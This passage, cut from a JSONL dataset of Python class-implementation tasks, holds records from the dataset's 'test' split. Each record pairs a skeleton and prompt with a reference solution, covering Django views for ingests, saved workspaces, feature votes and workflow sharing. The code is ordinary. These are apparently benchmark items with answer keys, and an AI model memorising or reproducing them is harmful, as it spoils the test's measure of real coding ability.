back to the user\"\"\"\n started = rest_util.parse_timestamp(request, 'started', required=False)\n ended = rest_util.parse_timestamp(request, 'ended', required=False)\n rest_util.check_time_range(started, ended)\n ingest_statuses = rest_util.parse_string_list(request, 'status', required=False)\n strike_ids = rest_util.parse_int_list(request, 'strike_id', required=False)\n scan_ids = rest_util.parse_int_list(request, 'scan_id', required=False)\n file_name = rest_util.parse_string(request, 'file_name', required=False)\n order = rest_util.parse_string_list(request, 'order', required=False)\n ingests = Ingest.objects.get_ingests(started=started, ended=ended, statuses=ingest_statuses, scan_ids=scan_ids, strike_ids=strike_ids, file_name=file_name, order=order)\n page = self.paginate_queryset(ingests)\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n", "source": "the_stack_v2_python_sparse", "source_path": "scale/ingest/views.py", "source_repo": "kfconsultant/scale", "split": "test", "star_events_count": 0} {"blob_id": "df6f751988b8704fcd4c3eab5d4c82cfc2f0f6a3", "bodies": ["self.app_domain = kwargs.get('app_domain')\nself.session_key = kwargs.get('session_key')\nself.user = kwargs.get('user')\nself.data_source_type_id = kwargs.get('data_source_type_id')\nself.workspace_id = kwargs.get('workspace_id')", "success, user_or_err = get_authenticated_user(request)\nif not success:\n return (False, user_or_err)\nreturn WorkspaceRetriever.list_workspaces_by_user(user_or_err, as_dict, **kwargs)", "if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\nsession_key = kwargs.get(KW_SESSION_KEY, None)\nws_list = workspace_queryset_base().filter(user=auth_user)\nif not as_dict:\n return (True, ws_list)\nfmt_list = []\nfor workspace in ws_list:\n ws_dict = workspace.as_dict_lite()\n ws_dict['is_current_session'] = bool(session_key and session_key == workspace.session_key)\n fmt_list.append(ws_dict)\nreturn (True, fmt_list)", "if ws_id is None:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\nif request is None:\n return (False, ERR_REQUEST_OBJ_IS_NONE)\nsuccess, user_or_err = get_authenticated_user(request)\nif not success:\n return (False, user_or_err)\nreturn WorkspaceRetriever.get_by_user_and_id(user_or_err, ws_id, as_dict)", "if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\nif not ws_id:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\nqparams = dict(id=ws_id)\nif auth_user.is_active and auth_user.is_superuser:\n workspace = workspace_queryset_base().filter(**qparams).first()\nelse:\n qparams['user'] = auth_user\n workspace = workspace_queryset_base().filter(**qparams).first()\nif workspace:\n if as_dict:\n return (True, workspace.as_dict())\n return (True, workspace)\nreturn (False, 'Workspace not found with user: [%s] and id: [%s]' % (auth_user, ws_id))"], "bodies_text": "<|body_start_0|>\n self.app_domain = kwargs.get('app_domain')\n self.session_key = kwargs.get('session_key')\n self.user = kwargs.get('user')\n self.data_source_type_id = kwargs.get('data_source_type_id')\n self.workspace_id = kwargs.get('workspace_id')\n<|end_body_0|>\n\n<|body_start_1|>\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.list_workspaces_by_user(user_or_err, as_dict, **kwargs)\n<|end_body_1|>\n\n<|body_start_2|>\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n session_key = kwargs.get(KW_SESSION_KEY, None)\n ws_list = workspace_queryset_base().filter(user=auth_user)\n if not as_dict:\n return (True, ws_list)\n fmt_list = []\n for workspace in ws_list:\n ws_dict = workspace.as_dict_lite()\n ws_dict['is_current_session'] = bool(session_key and session_key == workspace.session_key)\n fmt_list.append(ws_dict)\n return (True, fmt_list)\n<|end_body_2|>\n\n<|body_start_3|>\n if ws_id is None:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n if request is None:\n return (False, ERR_REQUEST_OBJ_IS_NONE)\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.get_by_user_and_id(user_or_err, ws_id, as_dict)\n<|end_body_3|>\n\n<|body_start_4|>\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n if not ws_id:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n qparams = dict(id=ws_id)\n if auth_user.is_active and auth_user.is_superuser:\n workspace = workspace_queryset_base().filter(**qparams).first()\n else:\n qparams['user'] = auth_user\n workspace = workspace_queryset_base().filter(**qparams).first()\n if workspace:\n if as_dict:\n return (True, workspace.as_dict())\n return (True, workspace)\n return (False, 'Workspace not found with user: [%s] and id: [%s]' % (auth_user, ws_id))\n<|end_body_4|>\n", "class_docstring": "Convenience class for retrieving SavedWorkspace objects", "class_name": "WorkspaceRetriever", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass WorkspaceRetriever:\n \"\"\"Convenience class for retrieving SavedWorkspace objects\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id\"\"\"\n <|body_0|>\n\n def list_workspaces_by_request(request, as_dict=False, **kwargs):\n \"\"\"Retrieve a list of all workspaces\"\"\"\n <|body_1|>\n\n def list_workspaces_by_user(auth_user, as_dict=False, **kwargs):\n \"\"\"Retrieve a of workspaces for a user\"\"\"\n <|body_2|>\n\n def get_by_id_and_request(ws_id, request, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n <|body_3|>\n\n def get_by_user_and_id(auth_user, ws_id, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.app_domain = kwargs.get('app_domain')\n self.session_key = kwargs.get('session_key')\n self.user = kwargs.get('user')\n self.data_source_type_id = kwargs.get('data_source_type_id')\n self.workspace_id = kwargs.get('workspace_id')\n<|end_body_0|>\n\n<|body_start_1|>\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.list_workspaces_by_user(user_or_err, as_dict, **kwargs)\n<|end_body_1|>\n\n<|body_start_2|>\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n session_key = kwargs.get(KW_SESSION_KEY, None)\n ws_list = workspace_queryset_base().filter(user=auth_user)\n if not as_dict:\n return (True, ws_list)\n fmt_list = []\n for workspace in ws_list:\n ws_dict = workspace.as_dict_lite()\n ws_dict['is_current_session'] = bool(session_key and session_key == workspace.session_key)\n fmt_list.append(ws_dict)\n return (True, fmt_list)\n<|end_body_2|>\n\n<|body_start_3|>\n if ws_id is None:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n if request is None:\n return (False, ERR_REQUEST_OBJ_IS_NONE)\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.get_by_user_and_id(user_or_err, ws_id, as_dict)\n<|end_body_3|>\n\n<|body_start_4|>\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n if not ws_id:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n qparams = dict(id=ws_id)\n if auth_user.is_active and auth_user.is_superuser:\n workspace = workspace_queryset_base().filter(**qparams).first()\n else:\n qparams['user'] = auth_user\n workspace = workspace_queryset_base().filter(**qparams).first()\n if workspace:\n if as_dict:\n return (True, workspace.as_dict())\n return (True, workspace)\n return (False, 'Workspace not found with user: [%s] and id: [%s]' % (auth_user, ws_id))\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000391", "length_bytes": 4984, "license_type": "permissive", "methods": [{"docstring": "Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id", "name": "__init__", "signature": "def __init__(self, **kwargs)"}, {"docstring": "Retrieve a list of all workspaces", "name": "list_workspaces_by_request", "signature": "def list_workspaces_by_request(request, as_dict=False, **kwargs)"}, {"docstring": "Retrieve a of workspaces for a user", "name": "list_workspaces_by_user", "signature": "def list_workspaces_by_user(auth_user, as_dict=False, **kwargs)"}, {"docstring": "Get SavedWorkspace by id", "name": "get_by_id_and_request", "signature": "def get_by_id_and_request(ws_id, request, as_dict=False)"}, {"docstring": "Get SavedWorkspace by id", "name": "get_by_user_and_id", "signature": "def get_by_user_and_id(auth_user, ws_id, as_dict=False)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_001335", "prompt": "Implement the Python class `WorkspaceRetriever` described below.\n\nClass description:\nConvenience class for retrieving SavedWorkspace objects\n\nMethod signatures and docstrings:\n- def __init__(self, **kwargs): Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id\n- def list_workspaces_by_request(request, as_dict=False, **kwargs): Retrieve a list of all workspaces\n- def list_workspaces_by_user(auth_user, as_dict=False, **kwargs): Retrieve a of workspaces for a user\n- def get_by_id_and_request(ws_id, request, as_dict=False): Get SavedWorkspace by id\n- def get_by_user_and_id(auth_user, ws_id, as_dict=False): Get SavedWorkspace by id", "prompted_full_text": "Implement the Python class `WorkspaceRetriever` described below.\n\nClass description:\nConvenience class for retrieving SavedWorkspace objects\n\nMethod signatures and docstrings:\n- def __init__(self, **kwargs): Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id\n- def list_workspaces_by_request(request, as_dict=False, **kwargs): Retrieve a list of all workspaces\n- def list_workspaces_by_user(auth_user, as_dict=False, **kwargs): Retrieve a of workspaces for a user\n- def get_by_id_and_request(ws_id, request, as_dict=False): Get SavedWorkspace by id\n- def get_by_user_and_id(auth_user, ws_id, as_dict=False): Get SavedWorkspace by id\n\n<|skeleton|>\nclass WorkspaceRetriever:\n \"\"\"Convenience class for retrieving SavedWorkspace objects\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id\"\"\"\n <|body_0|>\n\n def list_workspaces_by_request(request, as_dict=False, **kwargs):\n \"\"\"Retrieve a list of all workspaces\"\"\"\n <|body_1|>\n\n def list_workspaces_by_user(auth_user, as_dict=False, **kwargs):\n \"\"\"Retrieve a of workspaces for a user\"\"\"\n <|body_2|>\n\n def get_by_id_and_request(ws_id, request, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n <|body_3|>\n\n def get_by_user_and_id(auth_user, ws_id, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.app_domain = kwargs.get('app_domain')\n self.session_key = kwargs.get('session_key')\n self.user = kwargs.get('user')\n self.data_source_type_id = kwargs.get('data_source_type_id')\n self.workspace_id = kwargs.get('workspace_id')\n<|end_body_0|>\n\n<|body_start_1|>\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.list_workspaces_by_user(user_or_err, as_dict, **kwargs)\n<|end_body_1|>\n\n<|body_start_2|>\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n session_key = kwargs.get(KW_SESSION_KEY, None)\n ws_list = workspace_queryset_base().filter(user=auth_user)\n if not as_dict:\n return (True, ws_list)\n fmt_list = []\n for workspace in ws_list:\n ws_dict = workspace.as_dict_lite()\n ws_dict['is_current_session'] = bool(session_key and session_key == workspace.session_key)\n fmt_list.append(ws_dict)\n return (True, fmt_list)\n<|end_body_2|>\n\n<|body_start_3|>\n if ws_id is None:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n if request is None:\n return (False, ERR_REQUEST_OBJ_IS_NONE)\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.get_by_user_and_id(user_or_err, ws_id, as_dict)\n<|end_body_3|>\n\n<|body_start_4|>\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n if not ws_id:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n qparams = dict(id=ws_id)\n if auth_user.is_active and auth_user.is_superuser:\n workspace = workspace_queryset_base().filter(**qparams).first()\n else:\n qparams['user'] = auth_user\n workspace = workspace_queryset_base().filter(**qparams).first()\n if workspace:\n if as_dict:\n return (True, workspace.as_dict())\n return (True, workspace)\n return (False, 'Workspace not found with user: [%s] and id: [%s]' % (auth_user, ws_id))\n<|end_body_4|>\n", "revision_id": "f84751b33fde26cd379d8120b3c6a6b5ed2c315d", "skeleton": "<|skeleton|>\nclass WorkspaceRetriever:\n \"\"\"Convenience class for retrieving SavedWorkspace objects\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id\"\"\"\n <|body_0|>\n\n def list_workspaces_by_request(request, as_dict=False, **kwargs):\n \"\"\"Retrieve a list of all workspaces\"\"\"\n <|body_1|>\n\n def list_workspaces_by_user(auth_user, as_dict=False, **kwargs):\n \"\"\"Retrieve a of workspaces for a user\"\"\"\n <|body_2|>\n\n def get_by_id_and_request(ws_id, request, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n <|body_3|>\n\n def get_by_user_and_id(auth_user, ws_id, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class WorkspaceRetriever:\n \"\"\"Convenience class for retrieving SavedWorkspace objects\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Various keyword options: app_domain - as specified in configurations.models.DOMAIN_LIST session_key - django session key, stored in SavedWorkspace.session_key user - raven_auth.models.User data_source_type_id - workspaces.models.DataSourceType.id workspace_id - SavedWorkspace.id\"\"\"\n self.app_domain = kwargs.get('app_domain')\n self.session_key = kwargs.get('session_key')\n self.user = kwargs.get('user')\n self.data_source_type_id = kwargs.get('data_source_type_id')\n self.workspace_id = kwargs.get('workspace_id')\n\n def list_workspaces_by_request(request, as_dict=False, **kwargs):\n \"\"\"Retrieve a list of all workspaces\"\"\"\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.list_workspaces_by_user(user_or_err, as_dict, **kwargs)\n\n def list_workspaces_by_user(auth_user, as_dict=False, **kwargs):\n \"\"\"Retrieve a of workspaces for a user\"\"\"\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n session_key = kwargs.get(KW_SESSION_KEY, None)\n ws_list = workspace_queryset_base().filter(user=auth_user)\n if not as_dict:\n return (True, ws_list)\n fmt_list = []\n for workspace in ws_list:\n ws_dict = workspace.as_dict_lite()\n ws_dict['is_current_session'] = bool(session_key and session_key == workspace.session_key)\n fmt_list.append(ws_dict)\n return (True, fmt_list)\n\n def get_by_id_and_request(ws_id, request, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n if ws_id is None:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n if request is None:\n return (False, ERR_REQUEST_OBJ_IS_NONE)\n success, user_or_err = get_authenticated_user(request)\n if not success:\n return (False, user_or_err)\n return WorkspaceRetriever.get_by_user_and_id(user_or_err, ws_id, as_dict)\n\n def get_by_user_and_id(auth_user, ws_id, as_dict=False):\n \"\"\"Get SavedWorkspace by id\"\"\"\n if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\n if not ws_id:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\n qparams = dict(id=ws_id)\n if auth_user.is_active and auth_user.is_superuser:\n workspace = workspace_queryset_base().filter(**qparams).first()\n else:\n qparams['user'] = auth_user\n workspace = workspace_queryset_base().filter(**qparams).first()\n if workspace:\n if as_dict:\n return (True, workspace.as_dict())\n return (True, workspace)\n return (False, 'Workspace not found with user: [%s] and id: [%s]' % (auth_user, ws_id))\n", "source": "the_stack_v2_python_sparse", "source_path": "tworaven_apps/workspaces/workspace_retriever.py", "source_repo": "Mital188/TwoRavens", "split": "test", "star_events_count": 0} {"blob_id": "406e66a7dbdee8a5ac1b6aafa6a3a0fcc4ad9750", "bodies": ["feature_id = kwargs['feature_id']\ngate_id = kwargs.get('gate_id', None)\nvotes = Vote.get_votes(feature_id=feature_id, gate_id=gate_id)\ndicts = [converters.vote_value_to_json_dict(v) for v in votes]\nreturn {'votes': dicts}", "feature_id = kwargs['feature_id']\ngate_id = kwargs['gate_id']\nfeature = self.get_specified_feature(feature_id=feature_id)\nnew_state = self.get_int_param('state', validator=Vote.is_valid_state)\nuser = self.get_current_user(required=True)\ngate = Gate.get_by_id(gate_id)\nif not gate:\n self.abort(404, msg='Gate not found')\nif gate.feature_id != feature_id:\n self.abort(400, msg='Mismatched feature and gate')\nold_state = gate.state\nself.require_permissions(user, feature, gate, new_state)\napproval_defs.set_vote(feature_id, None, new_state, user.email(), gate_id)\nif new_state == Vote.REVIEW_REQUESTED:\n notifier_helpers.notify_approvers_of_reviews(feature, gate)\nelse:\n notifier_helpers.notify_subscribers_of_vote_changes(feature, gate, user.email(), new_state, old_state)\nreturn {'message': 'Done'}", "is_requesting_review = new_state == Vote.REVIEW_REQUESTED\nis_editor = permissions.can_edit_feature(user, feature.key.integer_id())\napprovers = approval_defs.get_approvers(gate.gate_type)\nis_approver = permissions.can_approve_feature(user, feature, approvers)\nif is_requesting_review and is_editor:\n return\nif is_approver:\n return\nif is_requesting_review:\n self.abort(403, msg='User may not request a review')\nelse:\n self.abort(403, msg='User is not an approver')"], "bodies_text": "<|body_start_0|>\n feature_id = kwargs['feature_id']\n gate_id = kwargs.get('gate_id', None)\n votes = Vote.get_votes(feature_id=feature_id, gate_id=gate_id)\n dicts = [converters.vote_value_to_json_dict(v) for v in votes]\n return {'votes': dicts}\n<|end_body_0|>\n\n<|body_start_1|>\n feature_id = kwargs['feature_id']\n gate_id = kwargs['gate_id']\n feature = self.get_specified_feature(feature_id=feature_id)\n new_state = self.get_int_param('state', validator=Vote.is_valid_state)\n user = self.get_current_user(required=True)\n gate = Gate.get_by_id(gate_id)\n if not gate:\n self.abort(404, msg='Gate not found')\n if gate.feature_id != feature_id:\n self.abort(400, msg='Mismatched feature and gate')\n old_state = gate.state\n self.require_permissions(user, feature, gate, new_state)\n approval_defs.set_vote(feature_id, None, new_state, user.email(), gate_id)\n if new_state == Vote.REVIEW_REQUESTED:\n notifier_helpers.notify_approvers_of_reviews(feature, gate)\n else:\n notifier_helpers.notify_subscribers_of_vote_changes(feature, gate, user.email(), new_state, old_state)\n return {'message': 'Done'}\n<|end_body_1|>\n\n<|body_start_2|>\n is_requesting_review = new_state == Vote.REVIEW_REQUESTED\n is_editor = permissions.can_edit_feature(user, feature.key.integer_id())\n approvers = approval_defs.get_approvers(gate.gate_type)\n is_approver = permissions.can_approve_feature(user, feature, approvers)\n if is_requesting_review and is_editor:\n return\n if is_approver:\n return\n if is_requesting_review:\n self.abort(403, msg='User may not request a review')\n else:\n self.abort(403, msg='User is not an approver')\n<|end_body_2|>\n", "class_docstring": "Users may see the set of votes on a feature, and add their own, if allowed.", "class_name": "VotesAPI", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VotesAPI:\n \"\"\"Users may see the set of votes on a feature, and add their own, if allowed.\"\"\"\n\n def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]:\n \"\"\"Return a list of all vote values for a given feature.\"\"\"\n <|body_0|>\n\n def do_post(self, **kwargs) -> dict[str, str]:\n \"\"\"Set a user's vote value for the specified feature and gate.\"\"\"\n <|body_1|>\n\n def require_permissions(self, user, feature, gate, new_state):\n \"\"\"Abort the request if the user lacks permission to set this vote.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n feature_id = kwargs['feature_id']\n gate_id = kwargs.get('gate_id', None)\n votes = Vote.get_votes(feature_id=feature_id, gate_id=gate_id)\n dicts = [converters.vote_value_to_json_dict(v) for v in votes]\n return {'votes': dicts}\n<|end_body_0|>\n\n<|body_start_1|>\n feature_id = kwargs['feature_id']\n gate_id = kwargs['gate_id']\n feature = self.get_specified_feature(feature_id=feature_id)\n new_state = self.get_int_param('state', validator=Vote.is_valid_state)\n user = self.get_current_user(required=True)\n gate = Gate.get_by_id(gate_id)\n if not gate:\n self.abort(404, msg='Gate not found')\n if gate.feature_id != feature_id:\n self.abort(400, msg='Mismatched feature and gate')\n old_state = gate.state\n self.require_permissions(user, feature, gate, new_state)\n approval_defs.set_vote(feature_id, None, new_state, user.email(), gate_id)\n if new_state == Vote.REVIEW_REQUESTED:\n notifier_helpers.notify_approvers_of_reviews(feature, gate)\n else:\n notifier_helpers.notify_subscribers_of_vote_changes(feature, gate, user.email(), new_state, old_state)\n return {'message': 'Done'}\n<|end_body_1|>\n\n<|body_start_2|>\n is_requesting_review = new_state == Vote.REVIEW_REQUESTED\n is_editor = permissions.can_edit_feature(user, feature.key.integer_id())\n approvers = approval_defs.get_approvers(gate.gate_type)\n is_approver = permissions.can_approve_feature(user, feature, approvers)\n if is_requesting_review and is_editor:\n return\n if is_approver:\n return\n if is_requesting_review:\n self.abort(403, msg='User may not request a review')\n else:\n self.abort(403, msg='User is not an approver')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000392", "length_bytes": 4047, "license_type": "permissive", "methods": [{"docstring": "Return a list of all vote values for a given feature.", "name": "do_get", "signature": "def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]"}, {"docstring": "Set a user's vote value for the specified feature and gate.", "name": "do_post", "signature": "def do_post(self, **kwargs) -> dict[str, str]"}, {"docstring": "Abort the request if the user lacks permission to set this vote.", "name": "require_permissions", "signature": "def require_permissions(self, user, feature, gate, new_state)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005461", "prompt": "Implement the Python class `VotesAPI` described below.\n\nClass description:\nUsers may see the set of votes on a feature, and add their own, if allowed.\n\nMethod signatures and docstrings:\n- def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]: Return a list of all vote values for a given feature.\n- def do_post(self, **kwargs) -> dict[str, str]: Set a user's vote value for the specified feature and gate.\n- def require_permissions(self, user, feature, gate, new_state): Abort the request if the user lacks permission to set this vote.", "prompted_full_text": "Implement the Python class `VotesAPI` described below.\n\nClass description:\nUsers may see the set of votes on a feature, and add their own, if allowed.\n\nMethod signatures and docstrings:\n- def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]: Return a list of all vote values for a given feature.\n- def do_post(self, **kwargs) -> dict[str, str]: Set a user's vote value for the specified feature and gate.\n- def require_permissions(self, user, feature, gate, new_state): Abort the request if the user lacks permission to set this vote.\n\n<|skeleton|>\nclass VotesAPI:\n \"\"\"Users may see the set of votes on a feature, and add their own, if allowed.\"\"\"\n\n def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]:\n \"\"\"Return a list of all vote values for a given feature.\"\"\"\n <|body_0|>\n\n def do_post(self, **kwargs) -> dict[str, str]:\n \"\"\"Set a user's vote value for the specified feature and gate.\"\"\"\n <|body_1|>\n\n def require_permissions(self, user, feature, gate, new_state):\n \"\"\"Abort the request if the user lacks permission to set this vote.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n feature_id = kwargs['feature_id']\n gate_id = kwargs.get('gate_id', None)\n votes = Vote.get_votes(feature_id=feature_id, gate_id=gate_id)\n dicts = [converters.vote_value_to_json_dict(v) for v in votes]\n return {'votes': dicts}\n<|end_body_0|>\n\n<|body_start_1|>\n feature_id = kwargs['feature_id']\n gate_id = kwargs['gate_id']\n feature = self.get_specified_feature(feature_id=feature_id)\n new_state = self.get_int_param('state', validator=Vote.is_valid_state)\n user = self.get_current_user(required=True)\n gate = Gate.get_by_id(gate_id)\n if not gate:\n self.abort(404, msg='Gate not found')\n if gate.feature_id != feature_id:\n self.abort(400, msg='Mismatched feature and gate')\n old_state = gate.state\n self.require_permissions(user, feature, gate, new_state)\n approval_defs.set_vote(feature_id, None, new_state, user.email(), gate_id)\n if new_state == Vote.REVIEW_REQUESTED:\n notifier_helpers.notify_approvers_of_reviews(feature, gate)\n else:\n notifier_helpers.notify_subscribers_of_vote_changes(feature, gate, user.email(), new_state, old_state)\n return {'message': 'Done'}\n<|end_body_1|>\n\n<|body_start_2|>\n is_requesting_review = new_state == Vote.REVIEW_REQUESTED\n is_editor = permissions.can_edit_feature(user, feature.key.integer_id())\n approvers = approval_defs.get_approvers(gate.gate_type)\n is_approver = permissions.can_approve_feature(user, feature, approvers)\n if is_requesting_review and is_editor:\n return\n if is_approver:\n return\n if is_requesting_review:\n self.abort(403, msg='User may not request a review')\n else:\n self.abort(403, msg='User is not an approver')\n<|end_body_2|>\n", "revision_id": "17f9886d064da5bda84006d5866077727646fff2", "skeleton": "<|skeleton|>\nclass VotesAPI:\n \"\"\"Users may see the set of votes on a feature, and add their own, if allowed.\"\"\"\n\n def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]:\n \"\"\"Return a list of all vote values for a given feature.\"\"\"\n <|body_0|>\n\n def do_post(self, **kwargs) -> dict[str, str]:\n \"\"\"Set a user's vote value for the specified feature and gate.\"\"\"\n <|body_1|>\n\n def require_permissions(self, user, feature, gate, new_state):\n \"\"\"Abort the request if the user lacks permission to set this vote.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class VotesAPI:\n \"\"\"Users may see the set of votes on a feature, and add their own, if allowed.\"\"\"\n\n def do_get(self, **kwargs) -> dict[str, list[dict[str, Any]]]:\n \"\"\"Return a list of all vote values for a given feature.\"\"\"\n feature_id = kwargs['feature_id']\n gate_id = kwargs.get('gate_id', None)\n votes = Vote.get_votes(feature_id=feature_id, gate_id=gate_id)\n dicts = [converters.vote_value_to_json_dict(v) for v in votes]\n return {'votes': dicts}\n\n def do_post(self, **kwargs) -> dict[str, str]:\n \"\"\"Set a user's vote value for the specified feature and gate.\"\"\"\n feature_id = kwargs['feature_id']\n gate_id = kwargs['gate_id']\n feature = self.get_specified_feature(feature_id=feature_id)\n new_state = self.get_int_param('state', validator=Vote.is_valid_state)\n user = self.get_current_user(required=True)\n gate = Gate.get_by_id(gate_id)\n if not gate:\n self.abort(404, msg='Gate not found')\n if gate.feature_id != feature_id:\n self.abort(400, msg='Mismatched feature and gate')\n old_state = gate.state\n self.require_permissions(user, feature, gate, new_state)\n approval_defs.set_vote(feature_id, None, new_state, user.email(), gate_id)\n if new_state == Vote.REVIEW_REQUESTED:\n notifier_helpers.notify_approvers_of_reviews(feature, gate)\n else:\n notifier_helpers.notify_subscribers_of_vote_changes(feature, gate, user.email(), new_state, old_state)\n return {'message': 'Done'}\n\n def require_permissions(self, user, feature, gate, new_state):\n \"\"\"Abort the request if the user lacks permission to set this vote.\"\"\"\n is_requesting_review = new_state == Vote.REVIEW_REQUESTED\n is_editor = permissions.can_edit_feature(user, feature.key.integer_id())\n approvers = approval_defs.get_approvers(gate.gate_type)\n is_approver = permissions.can_approve_feature(user, feature, approvers)\n if is_requesting_review and is_editor:\n return\n if is_approver:\n return\n if is_requesting_review:\n self.abort(403, msg='User may not request a review')\n else:\n self.abort(403, msg='User is not an approver')\n", "source": "the_stack_v2_python_sparse", "source_path": "api/reviews_api.py", "source_repo": "GoogleChrome/chromium-dashboard", "split": "test", "star_events_count": 574} {"blob_id": "64e15fa9ce188436ace05bcf08ff0538a4dc409f", "bodies": ["form_kwargs = super().get_form_kwargs()\nform_kwargs['workflow'] = self.workflow\nform_kwargs['user'] = self.request.user\nreturn form_kwargs", "self.workflow.shared.add(form.user_obj)\nself.workflow.save()\nself.workflow.log(self.request.user, models.Log.WORKFLOW_SHARE_ADD, share_email=form.user_obj.email)\nreturn http.JsonResponse({'html_redirect': ''})"], "bodies_text": "<|body_start_0|>\n form_kwargs = super().get_form_kwargs()\n form_kwargs['workflow'] = self.workflow\n form_kwargs['user'] = self.request.user\n return form_kwargs\n<|end_body_0|>\n\n<|body_start_1|>\n self.workflow.shared.add(form.user_obj)\n self.workflow.save()\n self.workflow.log(self.request.user, models.Log.WORKFLOW_SHARE_ADD, share_email=form.user_obj.email)\n return http.JsonResponse({'html_redirect': ''})\n<|end_body_1|>\n", "class_docstring": "View to create a new \"share\" user in the workflow.", "class_name": "WorkflowShareCreateView", "detected_licenses": ["LGPL-2.0-or-later", "BSD-3-Clause", "MIT", "Apache-2.0", "LGPL-2.1-only", "Python-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass WorkflowShareCreateView:\n \"\"\"View to create a new \"share\" user in the workflow.\"\"\"\n\n def get_form_kwargs(self) -> Dict:\n \"\"\"Store workflow and 'request.user' in kwargs\"\"\"\n <|body_0|>\n\n def form_valid(self, form) -> http.JsonResponse:\n \"\"\"Store the new shared user\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form_kwargs = super().get_form_kwargs()\n form_kwargs['workflow'] = self.workflow\n form_kwargs['user'] = self.request.user\n return form_kwargs\n<|end_body_0|>\n\n<|body_start_1|>\n 